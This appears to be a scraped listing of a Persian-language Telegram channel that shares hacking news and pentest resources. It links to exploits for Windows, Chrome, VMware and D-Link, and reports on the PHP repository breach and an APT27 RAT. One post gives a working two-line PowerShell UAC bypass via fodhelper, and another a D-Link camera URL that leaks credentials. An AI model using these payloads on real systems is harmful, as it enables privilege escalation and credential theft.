آدرس کانال:
دسته بندی ها:
فن آوری ها
زبان: فارسی
مشترکین:
1.27K
توضیحات از کانال
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید
بخش انگلیسی :
https://t.me/sec_nerd_en
برای عضویت در گروه پیام بدید:
@rect00
Ratings & Reviews
Reviews can be left only by registered users. All reviews are moderated by admins.
5 stars
0
4 stars
0
3 stars
0
2 stars
0
1 stars
2
آخرین پیام ها 18
2021-04-14 22:56:13
UAC bypass in 2 lines:New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
cmd -> fodhelper
PoC||GTFO
#windows
#privesc
@sec_nerd
548 views19:56
2021-04-08 11:40:00
مدیران php اعلام کردند حمله اخیر به ریپازیتوری گیت این شرکت پس از هک شدن دیتابیس کاربران در سامانه ی master.php.net انجام شده است.
روز ۲۸ مارس هکرهای ناشناس از سوی lerdorf و popov کامیت های آلوده به ریپازیتوری php-src اضافه و در این حمله یک بکدور به سورس کد php تزریق کردند.
در ابتدا تحلیل ها حاکی از این بود که git.php.net هک شده است اما اکنون گفته میشود این حمله از طریق HTTPS و با اطلاعات کاربری سامانه ی master صورت گرفته است.
گفته میشود هش های ذخیره شده در سامانه ی master از نوع md5 بوده و اکنون به bcrypt تغییر کرده اند.
https://thehackernews.com/2021/04/php-sites-user-database-was-hacked-in.html
#news
#breach
#php
@sec_nerd
797 viewsedited 08:40
2021-04-08 10:20:00
اکسپلویت برای آسیب پذیری CVE-2021-24086
TCP/IP DOS
https://github.com/0vercl0k/CVE-2021-24086
#windows
#dos
@sec_nerd
664 viewsedited 07:20
2021-04-06 10:27:31
یک کمپین بدافزاری در حال هدف قرار دادن دولتی ها و نظامیان در ویتنام است.
به گزارش kaspersky این رت که بنظر میرسد متعلق به گروه هکرهای چینی APT27 باشد قابلیت ایجاد سرویس، آلوده سازی پروسه، اجرای دستور و دریافت اسکرین شات از قربانی را دارد.
https://threatpost.com/spy-operations-vietnam-rat/165243/
#news
#china
#rat
@sec_nerd
974 views07:27
2021-04-06 10:21:55
تست نفوذ به سرویس FTP یک بانک
https://blog.lexfo.fr/pentesting-pesit-ftp.html
#ftp
#pentest
#RE
@sec_nerd
589 views07:21
2021-04-06 10:15:37
VMWare-vRealize-SSRF https://github.com/Henry4E36/VMWare-vRealize-SSRF CVE-2021-21975 #vmware #ssrf @sec_nerd
515 views07:15
2021-04-06 09:07:16
رایت آپ کشف باگ xss در گیت هاب و دسترسی به محتویات خصوصی
https://robertchen.cc/blog/2021/04/03/github-pages-xss
جایزه ۳۵ هزار دلار
#writeup
#bugbounty
#xss
#github
@sec_nerd
797 views06:07
2021-04-06 09:05:10
chrome CVE-2020-16040
برای نسخه های قبل از 87.0.4280.88
https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040
#chrome
#rce
@sec_nerd
547 views06:05
2021-04-01 11:58:11
https://github.com/Kevin-Robertson/InveighZero
InveighZero is a C# LLMNR/NBNS/mDNS/DNS/DHCPv6 spoofer and man-in-the-middle tool
#windows
#privesc
@sec_nerd
696 views08:58
2021-04-01 11:47:21
D-Link DCS-2530L (CVE-2020-25078)
POC:
https://REDACTED/config/getuser?index=0
#dlink
#network
@sec_nerd
658 views08:47